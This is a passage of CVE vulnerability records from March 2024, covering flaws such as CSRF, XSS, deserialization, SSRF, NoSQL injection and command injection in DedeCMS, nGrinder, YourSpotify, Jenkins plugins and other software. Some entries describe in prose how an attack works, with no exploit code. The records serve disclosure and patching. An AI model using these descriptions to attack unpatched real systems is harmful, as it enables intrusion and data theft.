CVE 2024 2822 Candidate A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/vote_edit.php. The manipulation of the argument aid leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257709 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257709 | MISC:VDB-257709 | DedeCMS vote_edit.php cross-site request forgery | URL:https://vuldb.com/?id.257709 | MISC:https://github.com/E1CHO/demo/blob/main/29.pdf | URL:https://github.com/E1CHO/demo/blob/main/29.pdf Assigned (20240322)
CVE 2024 28216 Candidate nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28216.html Assigned (20240307)
CVE 2024 28215 Candidate nGrinder before 3.5.9 allows an attacker to create or update webhook configuration due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28215.html Assigned (20240307)
CVE 2024 28214 Candidate nGrinder before 3.5.9 allows to set delay without limitation, which could be the cause of Denial of Service by remote attacker. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28214.html Assigned (20240307)
CVE 2024 28213 Candidate nGrinder before 3.5.9 allows to accept serialized Java objects from unauthenticated users, which could allow remote attacker to execute arbitrary code via unsafe Java objects deserialization. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28213.html Assigned (20240307)
CVE 2024 28212 Candidate nGrinder before 3.5.9 uses old version of SnakeYAML, which could allow remote attacker to execute arbitrary code via unsafe deserialization. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28212.html Assigned (20240307)
CVE 2024 28211 Candidate nGrinder before 3.5.9 allows connection to malicious JMX/RMI server by default, which could be the cause of executing arbitrary code via RMI registry by remote attacker. CONFIRM:NAVER Security Advisory | URL:https://cve.naver.com/detail/cve-2024-28211.html Assigned (20240307)
CVE 2024 2821 Candidate A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. Affected by this issue is some unknown functionality of the file /src/dede/friendlink_edit.php. The manipulation of the argument id leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257708 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257708 | MISC:VDB-257708 | DedeCMS friendlink_edit.php cross-site request forgery | URL:https://vuldb.com/?id.257708 | MISC:https://github.com/E1CHO/demo/blob/main/27.pdf | URL:https://github.com/E1CHO/demo/blob/main/27.pdf Assigned (20240322)
CVE 2024 2820 Candidate A vulnerability classified as problematic was found in DedeCMS 5.7. Affected by this vulnerability is an unknown functionality of the file /src/dede/baidunews.php. The manipulation of the argument filename leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257707 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257707 | MISC:VDB-257707 | DedeCMS baidunews.php cross-site request forgery | URL:https://vuldb.com/?id.257707 | MISC:https://github.com/E1CHO/demo/blob/main/26.pdf | URL:https://github.com/E1CHO/demo/blob/main/26.pdf Assigned (20240322)
CVE 2024 28199 Candidate phlex is an open source framework for building object-oriented views in Ruby. There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data. This was due to improper case-sensitivity in the code that was meant to prevent these attacks. If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user. If you splat user-provided attributes when rendering any HTML tag, malicious event attributes could be included in the output, executing JavaScript when the events are triggered by another user. Patches are available on RubyGems for all 1.x minor versions. Users are advised to upgrade. Users unable to upgrade should consider configuring a content security policy that does not allow `unsafe-inline`. MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy | URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy | MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline | URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline | MISC:https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1 | URL:https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1 | MISC:https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g | URL:https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g Assigned (20240306)
CVE 2024 28198 Candidate OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication. By manually manipulating http requests when using the draw.io integration it is possible to read arbitrary files as the configured system user and SSRF. The problem is fixed in version 18.1.6 and 18.2.2. It is advised to upgrade to the latest version of 18.1.x or 18.2.x. Users unable to upgrade may work around this issue by disabling the Draw.io module or the entire REST API which will secure the system. MISC:https://github.com/OpenOLAT/OpenOLAT/commit/23e6212e9412c3b099436159b8c8935321c91872 | URL:https://github.com/OpenOLAT/OpenOLAT/commit/23e6212e9412c3b099436159b8c8935321c91872 | MISC:https://github.com/OpenOLAT/OpenOLAT/security/advisories/GHSA-pqvm-h9mg-434c | URL:https://github.com/OpenOLAT/OpenOLAT/security/advisories/GHSA-pqvm-h9mg-434c | MISC:https://track.frentix.com/issue/OO-7553/XXE-injection-in-draw.io-endpoint | URL:https://track.frentix.com/issue/OO-7553/XXE-injection-in-draw.io-endpoint Assigned (20240306)
CVE 2024 28197 Candidate Zitadel is an open source identity management system. Zitadel uses a cookie to identify the user agent (browser) and its user sessions. Although the cookie was handled according to best practices, it was accessible on subdomains of the ZITADEL instance. An attacker could take advantage of this and provide a malicious link hosted on the subdomain to the user to gain access to the victim’s account in certain scenarios. A possible victim would need to login through the malicious link for this exploit to work. If the possible victim already had the cookie present, the attack would not succeed. The attack would further only be possible if there was an initial vulnerability on the subdomain. This could either be the attacker being able to control DNS or a XSS vulnerability in an application hosted on a subdomain. Versions 2.46.0, 2.45.1, and 2.44.3 have been patched. Zitadel recommends upgrading to the latest versions available in due course. Note that applying the patch will invalidate the current cookie and thus users will need to start a new session and existing sessions (user selection) will be empty. For self-hosted environments unable to upgrade to a patched version, prevent setting the following cookie name on subdomains of your Zitadel instance (e.g. within your WAF): `__Secure-zitadel-useragent`. MISC:https://github.com/zitadel/zitadel/security/advisories/GHSA-mq4x-r2w3-j7mr | URL:https://github.com/zitadel/zitadel/security/advisories/GHSA-mq4x-r2w3-j7mr Assigned (20240306)
CVE 2024 28196 Candidate your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version < 1.9.0 does not prevent other pages from displaying it in an iframe and is thus vulnerable to clickjacking. Clickjacking can be used to trick an existing user of YourSpotify to trigger actions, such as allowing signup of other users or deleting the current user account. Clickjacking works by opening the target application in an invisible iframe on an attacker-controlled site and luring a victim to visit the attacker page and interacting with it. By positioning elements over the invisible iframe, a victim can be tricked into triggering malicious or destructive actions in the invisible iframe, while they think they interact with a totally different site altogether. When a victim visits an attacker-controlled site while they are logged into YourSpotify, they can be tricked into performing actions on their YourSpotify instance without their knowledge. These actions include allowing signup of other users or deleting the current user account, resulting in a high impact to the integrity of YourSpotify. This issue has been addressed in version 1.9.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-m5x2-6hjm-cggq | URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-m5x2-6hjm-cggq Assigned (20240306)
CVE 2024 28195 Candidate your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify versions < 1.9.0 do not protect the API and login flow against Cross-Site Request Forgery (CSRF). Attackers can use this to execute CSRF attacks on victims, allowing them to retrieve, modify or delete data on the affected YourSpotify instance. Using repeated CSRF attacks, it is also possible to create a new user on the victim instance and promote the new user to instance administrator if a legitimate administrator visits a website prepared by an attacker. Note: Real-world exploitability of this vulnerability depends on the browser version and browser settings in use by the victim. This issue has been addressed in version 1.9.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Yooooomi/your_spotify/commit/c3ae87673910c9903bb53088c8b71ed2c9aa54e4 | URL:https://github.com/Yooooomi/your_spotify/commit/c3ae87673910c9903bb53088c8b71ed2c9aa54e4 | MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-hfgf-99p3-6fjj | URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-hfgf-99p3-6fjj Assigned (20240306)
CVE 2024 28194 Candidate your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify versions < 1.8.0 use a hardcoded JSON Web Token (JWT) secret to sign authentication tokens. Attackers can use this well-known value to forge valid authentication tokens for arbitrary users. This vulnerability allows attackers to bypass authentication and authenticate as arbitrary YourSpotify users, including admin users. This issue has been addressed in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-gvcr-g265-j827 | URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-gvcr-g265-j827 Assigned (20240306)
CVE 2024 28193 Candidate your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version <1.8.0 allows users to create a public token in the settings, which can be used to provide guest-level access to the information of that specific user in YourSpotify. The /me API endpoint discloses Spotify API access and refresh tokens to guest users. Attackers with access to a public token for guest access to YourSpotify can therefore obtain access to Spotify API tokens of YourSpotify users. As a consequence, attackers may extract profile information, information about listening habits, playlists and other information from the corresponding Spotify profile. In addition, the attacker can pause and resume playback in the Spotify app at will. This issue has been resolved in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this issue. MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-3782-758f-mj85 | URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-3782-758f-mj85 Assigned (20240306)
CVE 2024 28192 Candidate your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version <1.8.0 is vulnerable to NoSQL injection in the public access token processing logic. Attackers can fully bypass the public token authentication mechanism, regardless if a public token has been generated before or not, without any user interaction or prerequisite knowledge. This vulnerability allows an attacker to fully bypass the public token authentication mechanism, regardless if a public token has been generated before or not, without any user interaction or prerequisite knowledge. This issue has been addressed in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-c8wf-wcjc-2pvm | URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-c8wf-wcjc-2pvm Assigned (20240306)
CVE 2024 28187 Candidate SOY CMS is an open source CMS (content management system) that allows you to build blogs and online shops. SOY CMS versions prior to 3.14.2 are vulnerable to an OS Command Injection vulnerability within the file upload feature when accessed by an administrator. The vulnerability enables the execution of arbitrary OS commands through specially crafted file names containing a semicolon, affecting the jpegoptim functionality. This vulnerability has been patched in version 3.14.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/inunosinsi/soycms/commit/9b0e452f628df28dec69cd72b6b55db21066cbf8 | URL:https://github.com/inunosinsi/soycms/commit/9b0e452f628df28dec69cd72b6b55db21066cbf8 | MISC:https://github.com/inunosinsi/soycms/security/advisories/GHSA-qg3q-hfgc-5jmm | URL:https://github.com/inunosinsi/soycms/security/advisories/GHSA-qg3q-hfgc-5jmm Assigned (20240306)
CVE 2024 28186 Candidate FreeScout is an open source help desk and shared inbox built with PHP. A vulnerability has been identified in the Free Scout Application, which exposes SMTP server credentials used by an organization in the application to users of the application. This issue arises from the application storing complete stack traces of exceptions in its database. The sensitive information is then inadvertently disclosed to users via the `/conversation/ajax-html/send_log?folder_id=&thread_id={id}` endpoint. The stack trace reveals value of parameters, including the username and password, passed to the `Swift_Transport_Esmtp_Auth_LoginAuthenticator->authenticate()` function. Exploiting this vulnerability allows an attacker to gain unauthorized access to SMTP server credentials. With this sensitive information in hand, the attacker can potentially send unauthorized emails from the compromised SMTP server, posing a severe threat to the confidentiality and integrity of email communications. This could lead to targeted attacks on both the application users and the organization itself, compromising the security of email exchange servers. This issue has been addressed in version 1.8.124. Users are advised to upgrade. Users unable to upgrade should adopt the following measures: 1. Avoid Storing Complete Stack Traces, 2. Implement redaction mechanisms to filter and exclude sensitive information, and 3. Review and enhance the application's logging practices. MISC:https://github.com/freescout-helpdesk/freescout/commit/33639a89554998dcac645613130a27ac7872605e | URL:https://github.com/freescout-helpdesk/freescout/commit/33639a89554998dcac645613130a27ac7872605e | MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7wcq-2qmv-mvcm | URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7wcq-2qmv-mvcm Assigned (20240306)
CVE 2024 28184 Candidate WeasyPrint helps web developers to create PDF documents. Since version 61.0, there's a vulnerability which allows attaching content of arbitrary files and URLs to a generated PDF document, even if `url_fetcher` is configured to prevent access to files and URLs. This vulnerability has been patched in version 61.2. FEDORA:FEDORA-2024-baa87269ba | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLQZMOEDY72TS43HDXOBVID2VYCTWIH6/ | MISC:https://github.com/Kozea/WeasyPrint/commit/734ee8e2dc84ff3090682f3abff056d0907c8598 | URL:https://github.com/Kozea/WeasyPrint/commit/734ee8e2dc84ff3090682f3abff056d0907c8598 | MISC:https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-35jj-wx47-4w8r | URL:https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-35jj-wx47-4w8r Assigned (20240306)
CVE 2024 28183 Candidate ESP-IDF is the development framework for Espressif SoCs supported on Windows, Linux and macOS. A Time-of-Check to Time-of-Use (TOCTOU) vulnerability was discovered in the implementation of the ESP-IDF bootloader which could allow an attacker with physical access to flash of the device to bypass anti-rollback protection. Anti-rollback prevents rollback to application with security version lower than one programmed in eFuse of chip. This attack can allow to boot past (passive) application partition having lower security version of the same device even in the presence of the flash encryption scheme. The attack requires carefully modifying the flash contents after the anti-rollback checks have been performed by the bootloader (before loading the application). The vulnerability is fixed in 4.4.7 and 5.2.1. MISC:https://github.com/espressif/esp-idf/commit/3305cb4d235182067936f8e940e6db174e25b4b2 | URL:https://github.com/espressif/esp-idf/commit/3305cb4d235182067936f8e940e6db174e25b4b2 | MISC:https://github.com/espressif/esp-idf/commit/4c95aa445d4e84f01f86b6f3a552aa299276abf3 | URL:https://github.com/espressif/esp-idf/commit/4c95aa445d4e84f01f86b6f3a552aa299276abf3 | MISC:https://github.com/espressif/esp-idf/commit/534e3ad1fa68526a5f989fb2163856d6b7cd2c87 | URL:https://github.com/espressif/esp-idf/commit/534e3ad1fa68526a5f989fb2163856d6b7cd2c87 | MISC:https://github.com/espressif/esp-idf/commit/7003f1ef0dffc73c34eb153d1b0710babb078149 | URL:https://github.com/espressif/esp-idf/commit/7003f1ef0dffc73c34eb153d1b0710babb078149 | MISC:https://github.com/espressif/esp-idf/commit/b2cdc0678965790f49afeb6e6b0737cd24433a05 | URL:https://github.com/espressif/esp-idf/commit/b2cdc0678965790f49afeb6e6b0737cd24433a05 | MISC:https://github.com/espressif/esp-idf/commit/c33b9e1426121ce8cccf1a94241740be9cff68de | URL:https://github.com/espressif/esp-idf/commit/c33b9e1426121ce8cccf1a94241740be9cff68de | MISC:https://github.com/espressif/esp-idf/commit/f327ddf6adab0c28d395975785727b2feef57803 | URL:https://github.com/espressif/esp-idf/commit/f327ddf6adab0c28d395975785727b2feef57803 | MISC:https://github.com/espressif/esp-idf/security/advisories/GHSA-22x6-3756-pfp8 | URL:https://github.com/espressif/esp-idf/security/advisories/GHSA-22x6-3756-pfp8 Assigned (20240306)
CVE 2024 28181 Candidate turbo_boost-commands is a set of commands to help you build robust reactive applications with Rails & Hotwire. TurboBoost Commands has existing protections in place to guarantee that only public methods on Command classes can be invoked; however, the existing checks aren't as robust as they should be. It's possible for a sophisticated attacker to invoke more methods than should be permitted depending on the the strictness of authorization checks that individual applications enforce. Being able to call some of these methods can have security implications. Commands verify that the class must be a `Command` and that the method requested is defined as a public method; however, this isn't robust enough to guard against all unwanted code execution. The library should more strictly enforce which methods are considered safe before allowing them to be executed. This issue has been addressed in versions 0.1.3, and 0.2.2. Users are advised to upgrade. Users unable to upgrade should see the repository GHSA for workaround advice. MISC:https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba | URL:https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba | MISC:https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75 | URL:https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75 Assigned (20240306)
CVE 2024 28180 Candidate Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3. FEDORA:FEDORA-2024-453ee0b3b9 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJDO5VSIAOGT2WP63AXAAWNRSVJCNCRH/ | FEDORA:FEDORA-2024-560a7aca85 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXKGNCRU7OTM5AHC7YIYBNOWI742PRMY/ | MISC:https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298 | URL:https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298 | MISC:https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a | URL:https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a | MISC:https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502 | URL:https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502 | MISC:https://github.com/go-jose/go-jose/security/advisories/GHSA-c5q2-7r4c-mv6g | URL:https://github.com/go-jose/go-jose/security/advisories/GHSA-c5q2-7r4c-mv6g Assigned (20240306)
CVE 2024 28179 Candidate Jupyter Server Proxy allows users to run arbitrary external processes alongside their Jupyter notebook servers and provides authenticated web access. Prior to versions 3.2.3 and 4.1.1, Jupyter Server Proxy did not check user authentication appropriately when proxying websockets, allowing unauthenticated access to anyone who had network access to the Jupyter server endpoint. This vulnerability can allow unauthenticated remote access to any websocket endpoint set up to be accessible via Jupyter Server Proxy. In many cases, this leads to remote unauthenticated arbitrary code execution, due to how affected instances use websockets. The websocket endpoints exposed by `jupyter_server` itself is not affected. Projects that do not rely on websockets are also not affected. Versions 3.2.3 and 4.1.1 contain a fix for this issue. MISC:https://github.com/jupyterhub/jupyter-server-proxy/blob/9b624c4d9507176334b46a85d94a4aa3bcd29bed/jupyter_server_proxy/handlers.py#L433 | URL:https://github.com/jupyterhub/jupyter-server-proxy/blob/9b624c4d9507176334b46a85d94a4aa3bcd29bed/jupyter_server_proxy/handlers.py#L433 | MISC:https://github.com/jupyterhub/jupyter-server-proxy/commit/764e499f61a87641916a7a427d4c4b1ac3f321a9 | URL:https://github.com/jupyterhub/jupyter-server-proxy/commit/764e499f61a87641916a7a427d4c4b1ac3f321a9 | MISC:https://github.com/jupyterhub/jupyter-server-proxy/commit/bead903b7c0354b6efd8b4cde94b89afab653e03 | URL:https://github.com/jupyterhub/jupyter-server-proxy/commit/bead903b7c0354b6efd8b4cde94b89afab653e03 | MISC:https://github.com/jupyterhub/jupyter-server-proxy/security/advisories/GHSA-w3vc-fx9p-wp4v | URL:https://github.com/jupyterhub/jupyter-server-proxy/security/advisories/GHSA-w3vc-fx9p-wp4v Assigned (20240306)
CVE 2024 28176 Candidate jose is JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5. FEDORA:FEDORA-2024-453ee0b3b9 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJDO5VSIAOGT2WP63AXAAWNRSVJCNCRH/ | FEDORA:FEDORA-2024-560a7aca85 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXKGNCRU7OTM5AHC7YIYBNOWI742PRMY/ | MISC:https://github.com/panva/jose/commit/02a65794f7873cdaf12e81e80ad076fcdc4a9314 | URL:https://github.com/panva/jose/commit/02a65794f7873cdaf12e81e80ad076fcdc4a9314 | MISC:https://github.com/panva/jose/commit/1b91d88d2f8233f3477a5f4579aa5f8057b2ee8b | URL:https://github.com/panva/jose/commit/1b91d88d2f8233f3477a5f4579aa5f8057b2ee8b | MISC:https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q | URL:https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q Assigned (20240306)
CVE 2024 28175 Candidate Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Due to the improper URL protocols filtering of links specified in the `link.argocd.argoproj.io` annotations in the application summary component, an attacker can achieve cross-site scripting with elevated permissions. All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin). This vulnerability allows an attacker to perform arbitrary actions on behalf of the victim via the API, such as creating, modifying, and deleting Kubernetes resources. A patch for this vulnerability has been released in Argo CD versions v2.10.3 v2.9.8, and v2.8.12. There are no completely-safe workarounds besides upgrading. The safest alternative, if upgrading is not possible, would be to create a Kubernetes admission controller to reject any resources with an annotation starting with link.argocd.argoproj.io or reject the resource if the value use an improper URL protocol. This validation will need to be applied in all clusters managed by ArgoCD. MISC:https://github.com/argoproj/argo-cd/commit/479b5544b57dc9ef767d49f7003f39602c480b71 | URL:https://github.com/argoproj/argo-cd/commit/479b5544b57dc9ef767d49f7003f39602c480b71 | MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-jwv5-8mqv-g387 | URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-jwv5-8mqv-g387 Assigned (20240306)
CVE 2024 28174 Candidate In JetBrains TeamCity before 2023.11.4 presigned URL generation requests in S3 Artifact Storage plugin were authorized improperly MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240306)
CVE 2024 28173 Candidate In JetBrains TeamCity between 2023.11 and 2023.11.4 custom build parameters of the "password" type could be disclosed MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240306)
CVE 2024 28171 Candidate It is possible to perform a path traversal attack and write outside of the intended directory. If a file name is specified that already exists on the file system, then the original file will be overwritten. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 2817 Candidate A vulnerability, which was classified as problematic, has been found in Tenda AC15 15.03.05.18. Affected by this issue is the function fromSysToolRestoreSet of the file /goform/SysToolRestoreSet. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257672 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257672 | MISC:VDB-257672 | Tenda AC15 SysToolRestoreSet fromSysToolRestoreSet cross-site request forgery | URL:https://vuldb.com/?id.257672 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolRestoreSet.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolRestoreSet.md Assigned (20240321)
CVE 2024 28163 Candidate Under certain conditions, Support Web Pages of SAP NetWeaver Process Integration (PI) - versions 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application. MISC:https://me.sap.com/notes/3434192 | URL:https://me.sap.com/notes/3434192 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240306)
CVE 2024 28162 Candidate In Jenkins Delphix Plugin 3.0.1 through 3.1.0 (both inclusive) a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections fails to take effect until Jenkins is restarted when switching from disabled validation to enabled validation. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3330 Assigned (20240305)
CVE 2024 28161 Candidate In Jenkins Delphix Plugin 3.0.1, a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections is disabled by default. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3215 Assigned (20240305)
CVE 2024 28160 Candidate Jenkins iceScrum Plugin 1.1.6 and earlier does not sanitize iceScrum project URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3248 Assigned (20240305)
CVE 2024 2816 Candidate A vulnerability classified as problematic was found in Tenda AC15 15.03.05.18. Affected by this vulnerability is the function fromSysToolReboot of the file /goform/SysToolReboot. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257671 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257671 | MISC:VDB-257671 | Tenda AC15 SysToolReboot fromSysToolReboot cross-site request forgery | URL:https://vuldb.com/?id.257671 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolReboot.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolReboot.md Assigned (20240321)
CVE 2024 28159 Candidate A missing permission check in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers with Item/Read permission to trigger a build. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3325 Assigned (20240305)
CVE 2024 28158 Candidate A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3325 Assigned (20240305)
CVE 2024 28157 Candidate Jenkins GitBucket Plugin 0.8 and earlier does not sanitize Gitbucket URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3249 Assigned (20240305)
CVE 2024 28156 Candidate Jenkins Build Monitor View Plugin 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3280 Assigned (20240305)
CVE 2024 28155 Candidate Jenkins AppSpider Plugin 1.0.16 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3144 Assigned (20240305)
CVE 2024 28154 Candidate Jenkins MQ Notifier Plugin 1.4.0 and earlier logs potentially sensitive build parameters as part of debug information in build logs by default. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3180 Assigned (20240305)
CVE 2024 28153 Candidate Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3344 Assigned (20240305)
CVE 2024 28152 Candidate In Jenkins Bitbucket Branch Source Plugin 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, when discovering pull requests from forks, the trust policy "Forks in the same account" allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server. MISC:Jenkins Security Advisory 2024-03-06 | URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3300 Assigned (20240305)
